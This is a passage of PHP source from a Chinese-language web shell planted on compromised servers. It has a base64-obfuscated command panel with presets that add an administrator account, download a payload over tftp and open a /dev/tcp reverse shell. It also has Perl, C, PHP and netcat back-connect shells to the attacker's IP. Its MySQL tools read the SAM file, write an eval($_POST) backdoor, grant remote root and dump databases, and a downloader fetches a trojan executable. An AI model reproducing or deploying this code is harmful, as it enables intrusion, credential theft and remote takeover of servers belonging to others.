array("InforMix\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("ifx_close")), array("FilePro\xca\xfd\xbe\xdd\xbf\xe2", Info_Fun("filepro_fieldcount")), array("DBA/DBM\xc1\xac\xbd\xd3", Info_Fun("dba_close") . "&nbsp;/&nbsp;" . Info_Fun("dbmclose")), array("ODBC/dBASE\xc1\xac\xbd\xd3", Info_Fun("odbc_close") . "&nbsp;/&nbsp;" . Info_Fun("dbase_close")), array("PREL\xcf\xe0\xc8\xdd\xd3\xef\xb7\xa8[PCRE]", Info_Fun("preg_match")), array("PDF\xd6\xa7\xb3\xd6", Info_Fun("pdf_close")), array("\xcd\xbc\xd0\xce\xb4\xa6\xc0\xed[GD Library]", Info_Fun("imageline")), array("SNMP\xcd\xf8\xc2\xe7\xb9\xdc\xc0\xed\xd0\xad\xd2\xe9", Info_Fun("snmpget")));
            echo "<table width=\"100%\" border=\"0\">";
            for ($i = 0; $i < count($info); $i++) {
                echo '<tr><td width="40%">' . $info[$i][0] . '</td><td>' . $info[$i][1] . '</td></tr>' . "\n";
            }
            $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
            try {
                $registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");
                $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
                $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
            } catch (Exception $e) {
            }
            echo '<tr><td width="40%">Terminal Service�˿�Ϊ</td><td>' . $registry_proxystring . '</td></tr>' . "\n";
            echo '<tr><td width="40%">Telnet�˿�Ϊ</td><td>' . $Telnet . '</td></tr>' . "\n";
            echo '<tr><td width="40%">PcAnywhere�˿�Ϊ</td><td>' . $PcAnywhere . '</td></tr>' . "\n";
            echo "</table>";
            break;
        case "cmd":
            $res = '���Դ���';
            $cmd = 'dir';
            if (!empty($_POST['cmd'])) {
                $res = Exec_Run(base64_decode($_POST['cmd']));
                $cmd = htmlspecialchars(base64_decode($_POST['cmd']));
            }
            print <<<END
<script language="javascript">
function sFull(i){
\tStr = new Array(11);
\tStr[0] = "dir";
\tStr[1] = "net user PHPINFO_CC PHPINFO_CC /add";
\tStr[2] = "net localgroup administrators PHPINFO_CC /add";
\tStr[3] = "netstat -ano";
\tStr[4] = "ipconfig";
\tStr[5] = "copy c:\\1.php d:\\2.php";
\tStr[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe";
\tStr[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";
\tStr[8] = "tasklist -svc";
\tdocument.getElementById('cmd').value = Str[i];
\treturn true;
}
END;
            html_base();
            print <<<END
function SubmitUrl(){
\t\t\tdocument.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);
\t\t\tdocument.getElementById('gform').submit();
}
</script>
<form method="POST" name="gform" id="gform" ><center><div class="actall">\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee\xd0\xc2\xd4\xf6\xba\xdc\xb6\xe0\xd2\xfe\xb2\xd8\xba\xaf\xca\xfd\xa3\xac\xd5\xe2\xb8\xf6\xd6\xb4\xd0\xd0\xb2\xbb\xc1\xcb\xa3\xac\xb3\xfd\xc1\xcb\xb7\xb4\xb5\xaf\xb3\xf6\xc0\xb4\xa3\xac\xbe\xf8\xb6\xd4\xc3\xbb\xd3\xd0\xc8\xce\xba\xce\xb9\xa4\xbe\xdf\xc4\xdc\xd6\xb4\xd0\xd0\xc3\xfc\xc1\xee\xa3\xa1\xcd\xe2\xbc\xd3\xca\xb9\xd3\xc3BASE64\xbc\xd3\xc3\xdc\xcc\xe1\xbd\xbb\xa3\xac\xb7\xc0\xd6\xb9\xb1\xbb\xc0\xb9\xa3\xa8\xd0\xa1\xcf\xb8\xbd\xda\xa3\xac\xb4\xf3\xb3\xc9\xbe\xcd\xa3\xa9</div><div class="actall">
\xc3\xfc\xc1\xee\xb2\xce\xca\xfd <input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;">
<select onchange='return sFull(options[selectedIndex].value)'>
<option value="0" selected>--\xc3\xfc\xc1\xee\xbc\xaf\xba\xcf--</option>
<option value="1">\xcc\xed\xbc\xd3\xb9\xdc\xc0\xed\xd4\xb1</option>
<option value="2">\xc9\xe8\xce\xaa\xb9\xdc\xc0\xed\xd7\xe9</option>
<option value="3">\xb2\xe9\xbf\xb4\xb6\xcb\xbf\xda</option>
<option value="4">\xb2\xe9\xbf\xb4\xb5\xd8\xd6\xb7</option>
<option value="5">\xb8\xb4\xd6\xc6\xce\xc4\xbc\xfe</option>
<option value="6">FTP\xcf\xc2\xd4\xd8</option>
<option value="7">Linux\xb7\xb4\xb5\xaf</option>
<option value="8">\xb2\xe9\xbf\xb4\xbd\xf8\xb3\xcc</option>
</select>
\t<input type="button" value="\xd6\xb4\xd0\xd0" onclick="SubmitUrl();" style="width:80px;">
</div>
<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>
</form>
END;
            break;
        case "linux":
            $yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');
            $yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';
            $system = "PHP";
            print <<<END
<div class="actall">\xca\xb9\xd3\xc3\xb7\xbd\xb7\xa8\xa3\xba<br>
\t\t\t\xcf\xc8\xd4\xda\xd7\xd4\xbc\xba\xb5\xe7\xc4\xd4\xd4\xcb\xd0\xd0"nc -vv -l 12666"<br>
\t\t\t\xc8\xbb\xba\xf3\xd4\xda\xb4\xcb\xcc\xee\xd0\xb4\xc4\xe3\xb5\xe7\xc4\xd4\xb5\xc4IP,\xb5\xe3\xc1\xac\xbd\xd3\xa3\xa1\xb4\xcb\xb7\xb4\xb5\xaf\xba\xdc\xc8\xab\xba\xdc\xca\xb5\xd3\xc3\xa3\xa1\xb0\xfc\xc0\xa8NC\xb7\xb4\xb5\xaf\xa3\xa1</div>
<form method="POST" name="kform" id="kform">
<div class="actall">\xc4\xe3\xb5\xc4\xb5\xd8\xd6\xb7 <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>
<div class="actall">\xc1\xac\xbd\xd3\xb6\xcb\xbf\xda <input type="text" name="yourport" value="12666" style="width:400px"></div>
<div class="actall">\xd6\xb4\xd0\xd0\xb7\xbd\xca\xbd <select name="use" >
<option value="perl">Perl</option>
<option value="c">C</option>
<option value="php">PHP</option>
<option value="nc">NC</option>
</select></div>
<div class="actall"><input type="submit" value="\xbf\xaa\xca\xbc\xc1\xac\xbd\xd3" style="width:80px;"></div></form>
END;
            if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) {
                echo "<div class=\"actall\">";
                if ($_POST['use'] == 'perl') {
                    $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
                    echo File_Write('/tmp/envl_bc', "#!/usr/bin/perl\r\nuse Socket;\r\n\$cmd= \"lynx\";\r\n\$system= 'echo \"`uname -a`\";echo \"`id`\";/bin/sh';\r\n\$0=\$cmd;\r\n\$target=\$ARGV[0];\r\n\$port=\$ARGV[1];\r\n\$iaddr=inet_aton(\$target) || die(\"Error: \$!\\n\");\r\n\$paddr=sockaddr_in(\$port, \$iaddr) || die(\"Error: \$!\\n\");\r\n\$proto=getprotobyname('tcp');\r\nsocket(SOCKET, PF_INET, SOCK_STREAM, \$proto) || die(\"Error: \$!\\n\");\r\nconnect(SOCKET, \$paddr) || die(\"Error: \$!\\n\");\r\nopen(STDIN, \">&SOCKET\");\r\nopen(STDOUT, \">&SOCKET\");\r\nopen(STDERR, \">&SOCKET\");\r\nsystem(\$system);\r\nclose(STDIN);\r\nclose(STDOUT);\r\nclose(STDERR);", 'wb') ? '����/tmp/envl_bc�ɹ�<br>' : '����/tmp/envl_bcʧ��<br>';
                    $perlpath = Exec_Run('which perl');
                    $perlpath = $perlpath ? chop($perlpath) : 'perl';
                    @unlink('/tmp/envl_bc.c');
                    echo Exec_Run($perlpath . ' /tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ�����ʧ��';
                }
                if ($_POST['use'] == 'c') {
                    $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
                    echo File_Write('/tmp/envl_bc.c', "#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\nint main(int argc, char *argv[])\r\n{\r\n int fd;\r\n struct sockaddr_in sin;\r\n char rms[21]=\"rm -f \"; \r\n daemon(1,0);\r\n sin.sin_family = AF_INET;\r\n sin.sin_port = htons(atoi(argv[2]));\r\n sin.sin_addr.s_addr = inet_addr(argv[1]); \r\n bzero(argv[1],strlen(argv[1])+1+strlen(argv[2])); \r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; \r\n if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {\r\n   perror(\"[-] connect()\");\r\n   exit(0);\r\n }\r\n strcat(rms, argv[0]);\r\n system(rms);  \r\n dup2(fd, 0);\r\n dup2(fd, 1);\r\n dup2(fd, 2);\r\n execl(\"/bin/sh\",\"sh -i\", NULL);\r\n close(fd); \r\n}", 'wb') ? '����/tmp/envl_bc.c�ɹ�<br>' : '����/tmp/envl_bc.cʧ��<br>';
                    $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c');
                    @unlink('/tmp/envl_bc.c');
                    echo Exec_Run('/tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ�����ʧ��';
                }
                if ($_POST['use'] == 'php') {
                    if (!extension_loaded('sockets')) {
                        if ($system == 'WIN') {
                            @dl('php_sockets.dll') or die("Can't load socket");
                        } else {
                            @dl('sockets.so') or die("Can't load socket");
                        }
                    }
                    if ($system == "WIN") {
                        $env = array('path' => 'c:\\windows\\system32');
                    } else {
                        $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
                    }
                    $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
                    $host = $_POST['yourip'];
                    $port = $_POST['yourport'];
                    $host = gethostbyname($host);
                    $proto = getprotobyname("tcp");
                    if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) {
                        die("Socket\xb4\xb4\xbd\xa8\xca\xa7\xb0\xdc");
                    }
                    if (($ret = socket_connect($sock, $host, $port)) < 0) {
                        die("\xc1\xac\xbd\xd3\xca\xa7\xb0\xdc");
                    } else {
                        $message = "----------------------PHP\xb7\xb4\xb5\xaf\xc1\xac\xbd\xd3--------------------\n";
                        socket_write($sock, $message, strlen($message));
                        $cwd = "/var/www/html";
                        while ($cmd = socket_read($sock, 65535, $proto)) {
                            if (trim(strtolower($cmd)) == "exit") {
                                socket_write($sock, "Bye\n");
                                exit;
                            } else {
                                $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
                                if (is_resource($process)) {
                                    fwrite($pipes[0], $cmd);
                                    fclose($pipes[0]);
                                    $msg = stream_get_contents($pipes[1]);
                                    socket_write($sock, $msg, strlen($msg));
                                    fclose($pipes[1]);
                                    $msg = stream_get_contents($pipes[2]);
                                    socket_write($sock, $msg, strlen($msg));
                                    $return_value = proc_close($process);
                                }
                            }
                        }
                    }
                }
                if ($_POST['use'] == 'nc') {
                    echo "<div class=\"actall\">";
                    $mip = $_POST['yourip'];
                    $bport = $_POST['yourport'];
                    $fp = fsockopen($mip, $bport, $errno, $errstr);
                    if (!$fp) {
                        $result = "Error: could not open socket connection";
                    } else {
                        fputs($fp, "\n*********************************************\n \r\n\t\t              hacking url:http://www.caidaome.com is ok!        \r\n\t\t\t          \n*********************************************\n\n");
                        while (!feof($fp)) {
                            fputs($fp, " [r00t@H4c3ing:/root]# ");
                            $result = fgets($fp, 4096);
                            $message = `{$result}`;
                            fputs($fp, "--> " . $message . "\n");
                        }
                        fclose($fp);
                    }
                    echo "</div>";
                }
                echo '<br>����Գ�����Ӷ˿� (nc -vv -l ' . $_POST['yourport'] . ') ';
            }
            break;
        case "sqlshell":
            $MSG_BOX = '';
            $mhost = 'localhost';
            $muser = 'root';
            $mport = '3306';
            $mpass = '';
            $mdata = 'mysql';
            $msql = 'select version();';
            if (isset($_POST['mhost']) && isset($_POST['muser'])) {
                $mhost = $_POST['mhost'];
                $muser = $_POST['muser'];
                $mpass = $_POST['mpass'];
                $mdata = $_POST['mdata'];
                $mport = $_POST['mport'];
                if ($conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass)) {
                    @mysql_select_db($mdata);
                } else {
                    $MSG_BOX = '����MYSQLʧ��';
                }
            }
            $downfile = 'c:/windows/repair/sam';
            if (!empty($_POST['downfile'])) {
                $downfile = File_Str($_POST['downfile']);
                $binpath = bin2hex($downfile);
                $query = 'select load_file(0x' . $binpath . ')';
                if ($result = @mysql_query($query, $conn)) {
                    $k = 0;
                    $downcode = '';
                    while ($row = @mysql_fetch_array($result)) {
                        $downcode .= $row[$k];
                        $k++;
                    }
                    $filedown = basename($downfile);
                    if (!$filedown) {
                        $filedown = 'envl.tmp';
                    }
                    $array = explode('.', $filedown);
                    $arrayend = array_pop($array);
                    header('Content-type: application/x-' . $arrayend);
                    header('Content-Disposition: attachment; filename=' . $filedown);
                    header('Content-Length: ' . strlen($downcode));
                    echo $downcode;
                    exit;
                } else {
                    $MSG_BOX = '�����ļ�ʧ��';
                }
            }
            $o = isset($_GET['o']) ? $_GET['o'] : '';
            print <<<END
<form method="POST" name="nform" id="nform">
<center><div class="actall"><a href="?eanver=sqlshell">[MYSQL\xd6\xb4\xd0\xd0\xd3\xef\xbe\xe4]</a> 
<a href="?eanver=sqlshell&o=u">[MYSQL\xc9\xcf\xb4\xab\xce\xc4\xbc\xfe]</a> 
<a href="?eanver=sqlshell&o=d">[MYSQL\xcf\xc2\xd4\xd8\xce\xc4\xbc\xfe]</a>
<a href="?eanver=sqlshell&o=tk">[MYSQL\xcd\xd1\xbf\xe3\xb1\xb8\xb7\xdd]</a> </div>
<div class="actall">
\xb5\xd8\xd6\xb7 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
\xb6\xcb\xbf\xda <input type="text" name="mport" value="{$mport}" style="width:110px">
\xd3\xc3\xbb\xa7 <input type="text" name="muser" value="{$muser}" style="width:110px">
\xc3\xdc\xc2\xeb <input type="text" name="mpass" value="{$mpass}" style="width:110px">
\xbf\xe2\xc3\xfb <input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div>
<div class="actall" style="height:220px;">
END;
            if ($o == 'u') {
                $uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/��/exp.vbs';
                if (!empty($_POST['uppath'])) {
                    $uppath = $_POST['uppath'];
                    $query = 'Create TABLE a (cmd text NOT NULL);';
                    if (@mysql_query($query, $conn)) {
                        if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) {
                            $filecode = bin2hex(File_Read($tmpcode));
                        } else {
                            $tmp = File_Str(".") . '/upfile.tmp';
                            if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) {
                                $filecode = bin2hex(File_Read($tmp));
                                @unlink($tmp);
                            }
                        }
                        $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x' . $filecode . ',CHAR));';
                        if (@mysql_query($query, $conn)) {
                            $query = 'SELECT cmd FROM a INTO DUMPFILE \'' . $uppath . '\';';
                            $MSG_BOX = @mysql_query($query, $conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��';
                        } else {
                            $MSG_BOX = '�����ʱ��ʧ��';
                        }
                        @mysql_query('Drop TABLE IF EXISTS a;', $conn);
                    } else {
                        $MSG_BOX = '������ʱ��ʧ��';
                    }
                }
                print <<<END
<br><br>\xc9\xcf\xb4\xab\xc2\xb7\xbe\xb6 <input type="text" name="uppath" value="{$uppath}" style="width:500px">
<br><br>\xd1\xa1\xd4\xf1\xce\xc4\xbc\xfe <input type="file" name="upfile" style="width:500px;height:22px;">
</div><div class="actall"><input type="submit" value="\xc9\xcf\xb4\xab" style="width:80px;">
END;
            } elseif ($o == 'tk') {
                if ($_POST['dump'] == 'dump') {
                    $mysql_link = @mysql_connect($mhost, $muser, $mpass);
                    mysql_select_db($mdata);
                    mysql_query("SET NAMES gbk");
                    $mysql = "";
                    $q1 = mysql_query("show tables");
                    while ($t = mysql_fetch_array($q1)) {
                        $table = $t[0];
                        $q2 = mysql_query("show create table `{$table}`");
                        $sql = mysql_fetch_array($q2);
                        $mysql .= $sql['Create Table'] . ";\r\n\r\n";
                        $q3 = mysql_query("select * from `{$table}`");
                        while ($data = mysql_fetch_assoc($q3)) {
                            $keys = array_keys($data);
                            $keys = array_map('addslashes', $keys);
                            $keys = join('`,`', $keys);
                            $keys = "`" . $keys . "`";
                            $vals = array_values($data);
                            $vals = array_map('addslashes', $vals);
                            $vals = join("','", $vals);
                            $vals = "'" . $vals . "'";
                            $mysql .= "insert into `{$table}`({$keys}) values({$vals});\r\n";
                        }
                        $mysql .= "\r\n";
                    }
                    $filename = date("Y-m-d-GisA") . ".sql";
                    $fp = fopen($filename, 'w');
                    fputs($fp, $mysql);
                    fclose($fp);
                    $tip = "<br><center>\xca\xfd\xbe\xdd\xb1\xb8\xb7\xdd\xb3\xc9\xb9\xa6\xa3\xac\xb5\xe3\xbb\xf7\xcf\xc2\xd4\xd8\xca\xfd\xbe\xdd\xbf\xe2\xce\xc4\xbc\xfe\xa3\xba[<a href=\"" . $filename . "\" title=\"\xb5\xe3\xbb\xf7\xcf\xc2\xd4\xd8\">" . $filename . "</a>]</center>";
                } else {
                    $tip = "\xc9\xd0\xce\xb4\xb1\xb8\xb7\xdd\xa3\xac\xb1\xa3\xd6\xa4\xb1\xbe\xb3\xcc\xd0\xf2\xcb\xf9\xd4\xda\xc4\xbf\xc2\xbc\xbf\xc9\xd0\xb4";
                }
                print <<<END
<div class="actall"><form method="post" action="?s=n&o=tk"><br>
\xc7\xeb\xc9\xf7\xd3\xc3\xb1\xbe\xb9\xa6\xc4\xdc\xa3\xac\xca\xfd\xbe\xdd\xbf\xe2\xb9\xfd\xb4\xf3\xbd\xab\xd4\xec\xb3\xc9\xb7\xfe\xce\xf1\xc6\xf7\xe5\xb4\xbb\xfa\xb5\xc8\xc7\xe9\xbf\xf6 :-(<br><br>
{$tip}<br><br>
<input type="hidden" value="dump" name="dump" id="dump">
<input type="submit" value="\xd2\xbb\xbc\xfc\xb1\xb8\xb7\xdd" tilte="Submit" style="width:120px;height:64px;">
</form><div>
END;
            } elseif ($o == 'd') {
                print <<<END
<br><br><br>\xcf\xc2\xd4\xd8\xce\xc4\xbc\xfe <input type="text" name="downfile" value="{$downfile}" style="width:500px">
</div><div class="actall"><input type="submit" value="\xcf\xc2\xd4\xd8" style="width:80px;">
END;
            } else {
                if (!empty($_POST['msql'])) {
                    $msql = $_POST['msql'];
                    if ($result = @mysql_query($msql, $conn)) {
                        $MSG_BOX = 'ִ��SQL���ɹ�<br>';
                        $k = 0;
                        while ($row = @mysql_fetch_array($result)) {
                            $MSG_BOX .= $row[$k];
                            $k++;
                        }
                    } else {
                        $MSG_BOX .= mysql_error();
                    }
                }
                print <<<END
<script language="javascript">
function nFull(i){
\tStr = new Array(11);
\tStr[0] = "select version();";
\tStr[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
\tStr[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";
\tStr[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
\tStr[4] = "select @@plugin_dir";
\tStr[5] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib::\$INDEX_ALLOCATION';";
\tStr[6] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib\\\\\\\\plugin::\$INDEX_ALLOCATION';";
\tnform.msql.value = Str[i];
\treturn true;
}
</script>
<textarea name="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
<div class="actall">
<select onchange="return nFull(options[selectedIndex].value)">
\t<option value="0" selected>\xcf\xd4\xca\xbe\xb0\xe6\xb1\xbe</option>
\t<option value="1">\xb5\xbc\xb3\xf6\xce\xc4\xbc\xfe</option>
\t<option value="2">\xd0\xb4\xc8\xeb\xce\xc4\xbc\xfe</option>
\t<option value="3">\xbf\xaa\xc6\xf4\xcd\xe2\xc1\xac</option>
\t<option value="4">\xb2\xe9\xd1\xafMYSQL\xb2\xe5\xbc\xfe\xc4\xbf\xc2\xbc</option>
\t<option value="5">NTFS-ADS\xc1\xf7\xb4\xb4\xbd\xa8\xc4\xbf\xc2\xbc1</option>
\t<option value="5">NTFS-ADS\xc1\xf7\xb4\xb4\xbd\xa8\xc4\xbf\xc2\xbc2</option>
</select>
<input type="submit" value="\xd6\xb4\xd0\xd0" style="width:80px;">
END;
            }
            if ($MSG_BOX != '') {
                echo '</div><div class="actall">' . $MSG_BOX . '</div></center></form>';
            } else {
                echo "</div></center></form>";
            }
            break;
        case "downloader":
            $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
            $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str("./muma.exe");
            print <<<END
\t<form method="POST">
    <div class="actall">\xb3\xac\xc1\xac\xbd\xd3 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
    <div class="actall">\xcf\xc2\xd4\xd8\xb5\xbd <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
    <div class="actall"><input value="\xcf\xc2\xd4\xd8" type="submit" style="width:80px;"></div></form>
END;
            if (!empty($_POST['durl']) && !empty($_POST['dpath'])) {
                echo "<div class=\"actall\">";
                $contents = @file_get_contents($_POST['durl']);
                if (!$contents) {
                    echo "\xce\xde\xb7\xa8\xb6\xc1\xc8\xa1\xd2\xaa\xcf\xc2\xd4\xd8\xb5\xc4\xca\xfd\xbe\xdd";
                } else {
                    echo File_Write($_POST['dpath'], $contents, 'wb') ? '�����ļ��ɹ�' : '�����ļ�ʧ��';
                }
                echo "</div>";
            }
            break;
        case "issql":
            session_start();
            if ($_POST['sqluser'] && $_POST['sqlpass']) {
                $_SESSION['sql_user'] = $_POST['sqluser'];
                $_SESSION['sql_password'] = $_POST['sqlpass'];
            }
            if ($_POST['sqlhost']) {
                $_SESSION['sql_host'] = $_POST['sqlhost'];
            } else {
                $_SESSION['sql_host'] = 'localhost';
            }
            if ($_POST['sqlport']) {
                $_SESSION['sql_port'] = $_POST['sqlport'];
            } else {
                $_SESSION['sql_port'] = '3306';
            }
            if ($_SESSION['sql_user'] && $_SESSION['sql_password']) {
                if (!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))) {
                    unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
                    die(html_a('?eanver=sqlshell', '����ʧ���뷵��'));
                }
            } else {
                die(html_a('?eanver=sqlshell', '����ʧ���뷵��'));
            }
            $query = mysql_query("SHOW DATABASES", $sqlcon);
            html_n('<tr><td>��ݿ�б�:');
            while ($db = mysql_fetch_array($query)) {
                html_a('?eanver=issql&db=' . $db['Database'], $db['Database']);
                echo "&nbsp;&nbsp;";
            }
            html_n('</td></tr>');
            if ($_GET['db']) {
                css_js("3");
                mysql_select_db($_GET['db'], $sqlcon);
                html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">' . $_POST['sql'] . '</textarea><br>');
                html_select(array(0 => "--SQL\xd3\xef\xb7\xa8--", 7 => "\xcc\xed\xbc\xd3\xca\xfd\xbe\xdd", 8 => "\xc9\xbe\xb3\xfd\xca\xfd\xbe\xdd", 9 => "\xd0\xde\xb8\xc4\xca\xfd\xbe\xdd", 10 => "\xbd\xa8\xca\xfd\xbe\xdd\xb1\xed", 11 => "\xc9\xbe\xca\xfd\xbe\xdd\xb1\xed", 12 => "\xcc\xed\xbc\xd3\xd7\xd6\xb6\xce", 13 => "\xc9\xbe\xb3\xfd\xd7\xd6\xb6\xce"), 0, "onchange='return Full(options[selectedIndex].value)'");
                html_input("submit", "doquery", "\xd6\xb4\xd0\xd0");
                html_a("?eanver=issql&db=" . $_GET['db'], $_GET['db']);
                html_n('--->');
                html_a("?eanver=issql&db=" . $_GET['db'] . "&table=" . $_GET['table'], $_GET['table']);
                html_n('</form><br>');
                if (!empty($_POST['sql'])) {
                    if (@mysql_query($_POST['sql'], $sqlcon)) {
                        echo "\xd6\xb4\xd0\xd0SQL\xd3\xef\xbe\xe4\xb3\xc9\xb9\xa6";
                    } else {
                        echo "\xb3\xf6\xb4\xed: " . mysql_error();
                    }
                }
                if ($_GET['table']) {
                    html_n('<table border=1><tr>');
                    $query = "SHOW COLUMNS FROM " . $_GET['table'];
                    $result = mysql_query($query, $sqlcon);
                    $fields = array();
                    while ($row = mysql_fetch_assoc($result)) {
                        array_push($fields, $row['Field']);
                        html_n('<td><font color=#FFFF44>' . $row['Field'] . '</font></td>');
                    }
                    html_n('</tr><tr>');
                    $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
                    while ($text = @mysql_fetch_assoc($result)) {
                        foreach ($fields as $row) {
                            if ($text[$row] == "") {
                                $text[$row] = 'NULL';
                            }
                            html_n('<td>' . $text[$row] . '</td>');
                        }
                        echo "</tr>";
                    }
                } else {
                    $query = "SHOW TABLES FROM " . $_GET['db'];
                    $dat = mysql_query($query, $sqlcon) or die(mysql_error());
                    while ($row = mysql_fetch_row($dat)) {
                        html_n("<tr><td><a href='?eanver=issql&db=" . $_GET['db'] . "&table=" . $row[0] . "'>" . $row[0] . "</a></td></tr>");
                    }
                }
            }
            break;
        case "upfiles":
            html_n('<tr><td>����������ϴ������ļ���С: ' . @get_cfg_var('upload_max_filesize') . '<form method="POST" enctype="multipart/form-data">');
            html_input("text", "uppath", root_dir, "<br>\xc9\xcf\xb4\xab\xb5\xbd\xc2\xb7\xbe\xb6: ", "51");
